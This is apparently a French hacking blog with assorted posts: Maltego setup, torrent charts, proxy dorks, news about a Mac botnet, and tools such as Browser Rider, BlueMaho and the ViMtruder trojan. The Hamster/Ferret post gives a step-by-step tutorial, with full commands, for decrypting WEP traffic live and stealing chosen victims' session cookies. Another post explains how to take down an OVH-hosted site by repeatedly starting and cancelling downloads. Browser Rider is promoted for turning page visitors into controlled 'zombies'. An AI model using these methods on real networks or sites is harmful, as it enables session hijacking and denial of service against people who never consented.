installation de transforms pour maltego

Maltego est le champion de l'information gathering, il y a une édition community qui est gratuite.
Maltego permet la création de script et leur import directement via maltego nous allons donc installer un nouveau transform que l'ont va directement télécharger.

Celui qu'on va mettre est un script python il requiert M2Crypto
Sous ubuntu un sudo apt-get install python-m2crypto et c'est bon

Donc pour plus d'infos sur le transforms et le download du script: forum paterva

Personnellement le script pour le nouveau transforms est placé dans /pentest/web/Maltego/bin

• 1 / tools
• 2 / manage transforms
• 3 /new local transforms

Maintenant on rentre les propriétés:

• 1 / SSL-certificates-cn (c'est le nom affiché pour le transforms dans la liste)
• 2 / ip -> website using ssl certificate cn (une description)
• 3 / website (entity dans laquelle sera present le nouveau transforms)
• 4 / next
  

• 1 /usr/bin/python (ici c'est le lien vers mon binaire python, étant donné qu'on ajoute un script python)
• 2 /pentest/web/Maltego/bin/SSL_Certificate_CN.py
  

La suite c'est à vous de la gérer, personnellement je l'ai laissé par défaut

• 3 finish
• 4 save
  

Il ne reste plus qu'à tester le nouveau transforms


Plus: transforms maltego nmap

Site officiel: maltego
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

les 10 séries tv les plus téléchargés

Torrent freak vient de publier le top 10 des séries les plus téléchargés via torrent ce qui donne un bonne apercu de si vous êtes complètement asbine ou non.
Donc déja moi je suis pas mal (en même temps je suis pas fout de séries)

le résultats:

• 1 → Lost → 1.790.000 downloads
• 2 → Heroes → 1.660.000 downloads
• 3 → Prison Break → 1.120.000 downloads
• 4 → 24 → 720.000 downloads
• 5 → Docteur House → 720.000 downloads
• 6 → How I Met Your Mother → 635.000 downloads
• 7 → The Big Bang → 570.000 downloads
• 8 → Fringe → 530.000 downloads
• 9 → South Park → 440.000 downloads
• 10 → Chuck → 350.000 downloads

Alors perso j'ai vu quelque Lost, 1 ou 2 de Heroes, l'integral Prison Break (enfin je pense)
quelque 24, pas mal de Dr House, beaucoup de How i met your mother (je recommande c'est drole), et les autres je connais pas, sauf south park, j'en ai vu pas mal aussi.

A en choisir que un, je prend how i met your mother...

source: torrentfreak
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

Avoir un PROXY toujours valide

Les proxy sa apparait et sa disparait rapidement, pourtant un proxy valide c'est facile à trouver avec google.
Il suffit de trier par date pour avoir les dernières listes :)
Démonstration:

on veut un proxy qui utilise probablement le port 80 mais on peut affiner la recherche avec en plus le 8080 3128

+":80" +":8080" +":3128"
http://www.google.com/search?hl=fr&q=%2B%22%3A80%22+%2B%22%3A8080%22+%2B%22%3A3128%22&as_qdr=d

inurl:proxy +8080
http://www.google.com/search?hl=fr&q=inurl%3Aproxy+%2B8080&as_qdr=d

On peut tenter des variantes:

+":80" +":8080" +":3128" +"socks"
http://www.google.com/search?hl=fr&q=%2B%22%3A80%22+%2B%22%3A8080%22+%2B%22%3A3128%22+%2B%22socks%22&as_qdr=d&btnG=Rechercher&lr=

enjoy your proxy up to date :D

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

Browser Rider

Browser rider est une application tel que BeEF browser exploitation framework ca tourne sur le même principe, vous installez l'outil et vous collez dans une page le href du javascript, les personnes visitant la page seront des zombies dans votre console.
A partir de la vous pourrez balancer des boites de dialogues etc.
Browser rider à eu quelque updates depuis la dernière fois que j'en ai parlé.



Maintenant vous aurez besoin d'une base de donnés mysql et de préparer son installation. (c'est pas dur)
(enfin il me semble que dans celle que j'avais présenté il n'y avait pas besoin de mysql...)

Browser rider offre en plus de BeEf par éxemple:

BR AppFinder

This tool is an extension to the get_DOM payload that searches for known web applications within the stolen Html pages. Web applications that can be detected:

Drupal ImpressCMS Jahia Jojo CMS Joomla Liferay Mambo MiaCMS OpenCMS PhpBB PunBB UltimaBB XMBForum blosxom dotCMS eFront jAPS

et:

BR CodeGEN

This page provides you with different utilities to generate a Javascript/Html malicious code using the obfuscators installed within Browser Rider.

Bref si vous avez pas testé testez le :)

(vous avez une video de demo sur le site)

Le site officiel

Le wiki officiel

La version actuelle:

› Browser Rider v20090204 (changelog) stable

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

OVH et la sécurité c'est pas le top du top pour votre serveur...

OVH et la sécurité c'est pas térrible;

Pour ceux qui ne l'ont pas remarqué le site aircrack-ng.org est down depuis plus de trois jours, il est héberger chez OVH et a subi une attaque toute basique qui peut permettre à n'importe qui de down un serveur chez ovh sans grande difficultés...

Vous pouvez voir sur la capture qu'ils ont bloqué le site, malgré les explications fournient le site est toujours down.

http://www.aircrack-ng.org/


Voici l'explication de l'admin aircrack-ng sur le chan irc:

• user1> admin: Server died?

• admin> no, ddos and wrong calculation of traffic

• admin> s/ddos/dos

• user2> ddos cause the traffic bump?

• admin> dos alone

• admin> but it's a bit more complicated than that

• user2> i thought you all got slashdoted or something

• admin> because they base their calculation on apache logs

• admin> however, apache only shows the size of the request

• admin> not the real transferred bytes

• admin> and a f**cking jack*ss requested a big file a lot

• admin> making 1.5TB of fake traffic

Le truc c'est que si vous héberger un gros fichier, ou même que vous avez un truc pas énorme il devient très facile de down le site.
Car si vous n'avez pas un gros débit ou débit illimité, suffit d'appeler un fichier un grand nombre de fois.

éxemple sur dl.free.fr j'héberge une table airolib-ng, sur dl.free.fr si il y a 0 download en 1 moi ils virent le fichier...
Donc régulièrement je le télécharge au cas ou mais pas en intégralité, je lance la requète puis j'annule...

Bein la c'est un peu pareil suffit de faire un petit programme avec wget qui va récupérer le fichier sur le serveur ovh puis annuler effacer le fichier, puis relancer une transaction et ainsi de suite en boucle...

Vous lancez le download d'un fichier de 300Mo vous annulez à 3Mo , cela trois fois, pour vous vous avez utilisez 9Mo mais pour ovh vous avez utilisez 900Mo de traffic sur le site hébergé...

Résultat le petit lamer peut down à lui tout seul un site tranquillement sans plomber sa connexion, peut facilement utiliser un proxy... etc

tuto aircrack-ng
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

GFI languard gratos

GFI languard est un scanner de vulnérabiltés très réputé, il fonctionne sous windows.
GFI languard vient de passer en version freeware pour le scan de 5 ip.
Il comporte une base de plus de 15000 vulnérabilités et à été récompensé plusieurs fois, prouvant sa qualité.

Bref:

10-24 IPs - €32.00 per IP ca se gère avec une clé de license, donc si vous voulez utiliser GFI languard gratuitement vous disposez de 5 ip.

plus d'informations: ici
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

FON v2.0 disponible

Sortit aujourd'hui de la FON version 2, la fon est un petit routeur qui permet de partager simplement sa connexion.
En partageant votre connexion vous avez accès au réseau fon mondial, c'est à dire que vous pouvez vous connecter un peu partout.
Vous pouvez aussi générer de l'argent avec votre fonera.

La v 2 apporte comme grande nouveauté un connecteur usb qui permet de brancher un disque dur.

Ce qui donne:

votre routeur, votre fon, votre hd et c'est tout, via les dernier firmware vous pouvez télécharger en bittorrent sans pc allumé.
Elle offre un paquet d'autres fonctionnalités.

Elle est vendu 49.95 euros
Le firmware est libre, et il y a un modèle pour les routeurs buffalo et wrt54 gl (60 euros environs le routeur buffalo)
si vous voulez plus de puissance.

Il éxiste un firmware modifier pour transformer votre fonera, en vilain point d'accès, c'est interceptor de chez digininja

plus d'infos sur cette fonera
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

google earth 5 fix ubuntu

Je viens d'installer google earth sur ubuntu jaunty et ca merde il crash net, il y a un problème avec libssl0.9.8, donc c'est pas grave ca se fix en deux lignes.
Voici le type d'erreur:

root@Oo:~# googleearth
Warning: Unable to create prefs directory '/root/.googleearth'. Le fichier existe.
./googleearth-bin: relocation error: /lib/i686/cmov/libssl.so.0.9.8: symbol BIO_test_flags, version OPENSSL_0.9.8 not defined in file libcrypto.so.0.9.8 with link time reference
root@Oo:~#

Je considère que vous avez une installation de google earth par défaut, c'est à dire que le chemin est:

/opt/google-earth

on se fout en root:

sudo su

on change le nom la lib en question dans votre repertoire google earth

mv /opt/google-earth/libcrypto.so.0.9.8 /opt/google-earth/libcrypto.so.0.9.8.bak

on copie libcrypto.so.0.9.8 (la notre qui est dans lib sur notre système ubuntu) vers google earth:

cp /lib/libcrypto.so.0.9.8 /opt/google-earth/

On relance le machin

googleearth

et c'est cool ca fonctionne...
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

des macintosh vérolés à la pelle

Un réseau de mac zombies trouvé, faisant un joli botnet pour des attaques ddos...
Les mac touchés sont les os x qui ont une base intel.
le partage du malware c'est éffectué sur réseau p2p, sur des logiciels propriétaire cracké contenant le malware.

Donc apparement c'est sur le logiciel iworks 09 et photoshop cs4 (en meme temps y a gimp :p voila à vouloir faire les malins :) )

Donc c'est deux logiciels très présents sur les réseaux p2p et ducoup ca a fait un carton...

plus d'infos: theinquirer.fr
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

hamster vol de cookie sur encryption wep à la volé

Il y a peu hamster et ferret sont sortient en v2, hamster est un outil de sidejacking, et avec celui la vous pouvez récupérer en direct les cookie sur réseau ouvert ou encryptés en wep, donc voici un petit tuto sur son installation et utilisation.

comme outil du même style on a wifizoo seulement il est pas possible de l'utiliser sur du wep à la volé, on peut capturer avec airodump-ng décrypter avec airdecap-ng et ensuite passer le pcap à wifizoo.

Donc ici l'interet c'est de pouvoir décrypter à la volé l'encryption, et pouvoir utiliser les cookies de la victime.
Autre truc sympa avec hamster et ferret c'est qu'il logue tout par ip, vous pouvez donc choisir une victime.

Bon on va voir comment l'utiliser sur du wep :)

installation, sous ubuntu jaunty, je l'installe dans /pentest/wireless après a vous de voir ou vous l'installer...

(si vous avez pas pentest wireless)
sudo su
cd / && mkdir pentest && cd pentest && mkdir wireless

sudo su
apt-get install libpcap-dev
cd /pentest/wireless
wget http://hamster.erratasec.com/downloads/hamster-2.0.0.zip
unzip hamster-2.0.0.zip
rm -f hamster-2.0.0.zip
mv hamster hamster2 && cd hamster2/build/gcc4 && make
cd /pentest/wireless/ferret/build/gcc4 && make
cd /pentest/wireless && mkdir hamster
cp /pentest/wireless/ferret/bin/ferret /pentest/wireless/hamster
cp /pentest/wireless/hamster2/bin/favicon.ico /pentest/wireless/hamster
cp /pentest/wireless/hamster2/bin/hamster /pentest/wireless/hamster
cp /pentest/wireless/hamster2/bin/hamster.css /pentest/wireless/hamster
cp /pentest/wireless/hamster2/bin/hamster.js /pentest/wireless/hamster
cd /pentest/wireless
rm -rf ferret
rm -rf hamster2

Voila pour l'installation.
Maintenant tout est dans cd /pentest/wireless/hamster
vous avez le binaire de hamster et de ferret

./ferret -h

options:
-i Sniffs the wire(less) attached to that network adapter.
Must have libpcap or winpcap installed to work.
-r Read files in off-line mode. Can use wildcards, such as
using "ferret -r *.pcap". Doesn't need libpcap to work.
-c Reads in more advanced parameters from a file.

ferret n'est pas specialement utile pour une capture en live, dans le sens ou vous pouvez directement le controller via hamster et son interface web

la difference est que si vous directement hamster, votre pcap sera dans temp alors que si vous lancez:

./ferret -i wlan0
./hamster

la votre pcap (fichier de capture sera dans cd /pentest/wireless/hamster)

Bon allez balance sur du wep ginette

apt-get install aircrack-ng
si vous ne l'aviez pas déja

On va utiliser airtun-ng comme dans le tuto wireshark
airmon-ng start wlan0

wlan0 est mon interface que je place en mode monitor

(j'utilise un driver patché, donc a vous de voir si pour la suite vous devez utiliser mon0)

airodump-ng -w w -c 11 wlan0

je decide d'enregistrer un fichier -w w (nommé w)
je lance la capture sur le channel -c 11 (11)
wlan0 mon interface en monitor
airtun-ng -a 00:11:22:33:44:55 -w 21:12:21:12:21 wlan0

-a l'@ mac du routeur
-w la clé wep
wlan0 mon interface

ifconfig at0 up

(laissez tourner airodump-ng et airtun-ng pour que cela fonctionne)

maintenant soi je lance hamster et ferret, soi juste hamster

./ferret -i at0
./hamster

avec votre navigateur internet rendez vous ici:

http://127.0.0.1:1234/

(si vous avez pas lancé ferret, pour activer votre sniff, rendez vous depuis l'interface web dans 'adapter' et remplacez eth0 par at0)


Maintenant vous sniffez en direct sur une encryption wep et les cookies seront automatiquement récoltés, il ne reste plus qu'a directement faire le jump depuis l'interface web avec le cookie de votre choix.

Voili voilou

Site officiel hamster

crack de clé wep et wpa

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

BlueMaho nouvelle version de l'utilitaire pour le pentesting bluetooth

BlueMaho est un utilitaire comprenant les meilleurs outils pour les test de sécurités sur le bluetooth, il offre un gui permettant le contrôle de tous les outils incluent.
Bluemaho est écrit en python, est open source et est destiné à une utilisation sous linux.

Outils intégrés:

• atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
• bccmd by Marcel Holtmann
• bdaddr.c by Marcel Holtmann
• bluetracker.py by smiley
• carwhisperer v0.2 by Martin Herfurt
• psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
• BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
• btftp v0.1 by Marcel Holtmann
• btobex v0.1 by Marcel Holtmann
• greenplaque v1.5 by digitalmunition.com
• L2CAP packetgenerator by Bastian Ballmann
• obex stress tests 0.1
• redfang v2.50 by Ollie Whitehouse
• ussp-push v0.10 by Davide Libenzi
• exploits/attacks:
• Bluebugger v0.1 by Martin J. Muench
• bluePIMp by Kevin Finisterre
• BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
• helomoto by Adam Laurie
• hidattack v0.1 by Collin R. Mulliner
• Mode 3 abuse attack
• Nokia N70 l2cap packet DoS PoC Pierre Betouin
• opush abuse (prompts flood) DoS attack
• Sony-Ericsson reset display PoC by Pierre Betouin

Le changelog:

• NEW: statistics (uniq devices by day/hour, vendors, services etc)
• NEW: handbook
• NEW: opush abuse (prompts flood) DoS attack
• NEW: OBEX stress tests
• NEW: DoS in OPUSH filename for Nokia 7610, 3210, N70, N73
• NEW: Mode 3 abuse attack: get pairing by using social engineering
• NEW: shows times device was found in defined place
• NEW: shows if different names were used by same bd_addr
• NEW: shows PSM and RFCOMM channels in SDP vrowse info
• NEW: added carwhisperer 0.2
• NEW: using 'lightblue' package for OBEX some operations
• FIX: some code improvements for more usability and stability
• CHG: rewrited bluetracker.py for more stability
• CHG: fontsize can be changed in config
• CHG: add specifying of local hci device to atshell.c, psm_scan.c, rfcomm_scan.c (added timeout, scans more accuracy)
• CHG: oui.txt is now used original format
• CHG: greenplague removed

Testé brievement sur une ubuntu jaunty avec python2.5 (attention à bien lire la page officiel pour l'installation...)

site: BlueMaho
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

vimtruder un trojan de compétition open source pour linux

Un trojan est un logiciel permettant le controle d'une machine, en voila un open source pour linux qui fonctionne en virtual machine.
Vimtruder est écrit en python, l'archive contient le server et le client, il faudra éditer préalablement le truc...

je cite:

"This first version is only a proof-of-concept to show how easily it is done; ViMtruder can be further weaponized, adding an open source password sniffer (Dsniff), vulnerability scanner (Nessus), password cracker (THC Hydra), and exploit platform (Metasploit), as well as DoS scripts."

bref ca à l'air interessant comme concept...

Plus d'infos sur le site: infosegura
Lien de download: googlecode


source wallpaper: http://tb.polygonized.com/wallpapers
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

polices pour gimp [top 100]

J'ai fait une archive du top 100 des polices de chez dafont, ce qui évite de téléchager des polices une par une, ca fonctionne parfaitement sous linux comme sous windows et ne fonctionne pas que avec gimp biensurs...
Donc si ca vous interesse

pour installer les polices sous linux en une ligne de commande:

cd && cd .fonts && wget http://bricowifi.free.fr/down/compile-bricowifi.zip && unzip compile-bricowifi.zip && rm -f compile-bricowifi.zip || cd && mkdir .fonts && cd .fonts && wget http://bricowifi.free.fr/down/compile-bricowifi.zip && unzip compile-bricowifi.zip && rm -f compile-bricowifi.zip

[en gros ca créer le dossier .fonts (dossier masqué) dans votre home si il ne le trouve pas puis "installe", si il le trouve il "installe" directement les polices]

Il ne reste plus qu'à relancer gimp pour qu'elle soit prisent en compte.
Top 100 - 2 polices (archives endommagés)
et j'en ai ajouté 3 sympa...

Pour installer les polices sous windows :

download: http://bricowifi.free.fr/down/compile-bricowifi.zip
décompressez l'archive et placez le contenu dans:
C:\Windows\Fonts ou C:\WINNT\Fonts

Pour installer les polices sous mac:

idem que sous windows, mais on place les polices dans:
/Library/Fonts
(pour tous les user)
pour un seul utilisateur:
/Users(ou Utilisateurs)/Votre_nom_utilisateur/Library(ou Bibliothèque)/Fonts

source wallpaper: http://keusta.net/blog/images/graffiti/ivry/goth_font_big.jpg
(en couleur / ici je l'ai passé en noir et blanc)

Attention certaines polices disposent d'une license, (tout est dans le fichier) donc si c'est pour un usage commercial vérifiez la license en fonction de la police !

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

tuer un processus sans connaitre le nom complet

Une petite commande sympa sous linux,qui permet de tuer un processus sans connaitre le nom complet.
L'utilité de buter un processus sans connaitre le nom est que ca fait gagner du temps, et c'est surtout precieux quand votre uc est à 100 %

Donc cette commande c'est pkill

exemple je lance le navigateur firefox et sur irc on me balance un lien pourri du genre:

http://bricowifi.free.fr/bricowifi (attention lien à caractère pornographique)

pas de chance je suis dans un lieu public ou autre (taff etc)
et je veux fermer ca rapidos...

en principe le nom est firefox-bin

mais si je ne le connait pas, un:

pkill firefo
va buter tous les process commencant par firefo

ce qui est vachement pratique dans certaines situations

:)

(attention quand même en utilisant cette commande, vu que ca bute tout ce qui va correspondre à votre mot clé)

la man pkill:

NAME
pgrep, pkill - look up or signal processes based on name and other
attributes


SYNOPSIS
pgrep [-cflvx] [-d delimiter] [-n|-o] [-P ppid,...] [-g pgrp,...]
[-s sid,...] [-u euid,...] [-U uid,...] [-G gid,...] [-t term,...]
[pattern]


pkill [-signal] [-fvx] [-n|-o] [-P ppid,...] [-g pgrp,...] [-s sid,...]
[-u euid,...] [-U uid,...] [-G gid,...] [-t term,...] [pattern]


DESCRIPTION
pgrep looks through the currently running processes and lists the pro‐
cess IDs which matches the selection criteria to stdout. All the cri‐
teria have to match. For example,


$ pgrep -u root sshd


will only list the processes called sshd AND owned by root. On the
other hand,


$ pgrep -u root,daemon


will list the processes owned by root OR daemon.

pkill will send the specified signal (by default SIGTERM) to each pro‐
cess instead of listing them on stdout.


OPTIONS
-c Suppress normal output; instead print a count of matching pro‐
cesses.

-d delimiter
Sets the string used to delimit each process ID in the output
(by default a newline). (pgrep only.)

-f The pattern is normally only matched against the process name.
When -f is set, the full command line is used.

-g pgrp,...
Only match processes in the process group IDs listed. Process
group 0 is translated into pgrep’s or pkill’s own process group.

-G gid,...
Only match processes whose real group ID is listed. Either the
numerical or symbolical value may be used.

-l List the process name as well as the process ID. (pgrep only.)

-n Select only the newest (most recently started) of the matching
processes.

-o Select only the oldest (least recently started) of the matching
processes.

-P ppid,...
Only match processes whose parent process ID is listed.

-s sid,...
Only match processes whose process session ID is listed. Ses‐
sion ID 0 is translated into pgrep’s or pkill’s own session ID.

-t term,...
Only match processes whose controlling terminal is listed. The
terminal name should be specified without the "/dev/" prefix.

-u euid,...
Only match processes whose effective user ID is listed. Either
the numerical or symbolical value may be used.

-U uid,...
Only match processes whose real user ID is listed. Either the
numerical or symbolical value may be used.

-v Negates the matching.

-x Only match processes whose name (or command line if -f is speci‐
fied) exactly match the pattern.

-signal
Defines the signal to send to each matched process. Either the
numeric or the symbolic signal name can be used. (pkill only.)


OPERANDS
pattern
Specifies an Extended Regular Expression for matching against
the process names or command lines.


EXAMPLES
Example 1: Find the process ID of the named daemon:


$ pgrep -u root named


Example 2: Make syslog reread its configuration file:


$ pkill -HUP syslogd


Example 3: Give detailed information on all xterm processes:


$ ps -fp $(pgrep -d, -x xterm)


Example 4: Make all netscape processes run nicer:


$ renice +4 ‘pgrep netscape‘


EXIT STATUS
0 One or more processes matched the criteria.
1 No processes matched.
2 Syntax error in the command line.
3 Fatal error: out of memory etc.

NOTES
The process name used for matching is limited to the 15 characters
present in the output of /proc/pid/stat. Use the -f option to match
against the complete command line, /proc/pid/cmdline.

The running pgrep or pkill process will never report itself as a match.

BUGS
The options -n and -o and -v can not be combined. Let me know if you
need to do this.

Defunct processes are reported.

SEE ALSO
ps(1), regex(7), signal(7), killall(1), skill(1), kill(1), kill(2)

STANDARDS
pkill and pgrep were introduced in Sun’s Solaris 7. This implementa‐
tion is fully compatible.

AUTHOR
Kjetil Torgrim Homme

Albert Cahalan is the current maintainer of the
procps package.

Please send bug reports to



Linux October 5, 2007 PGREP(1)
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D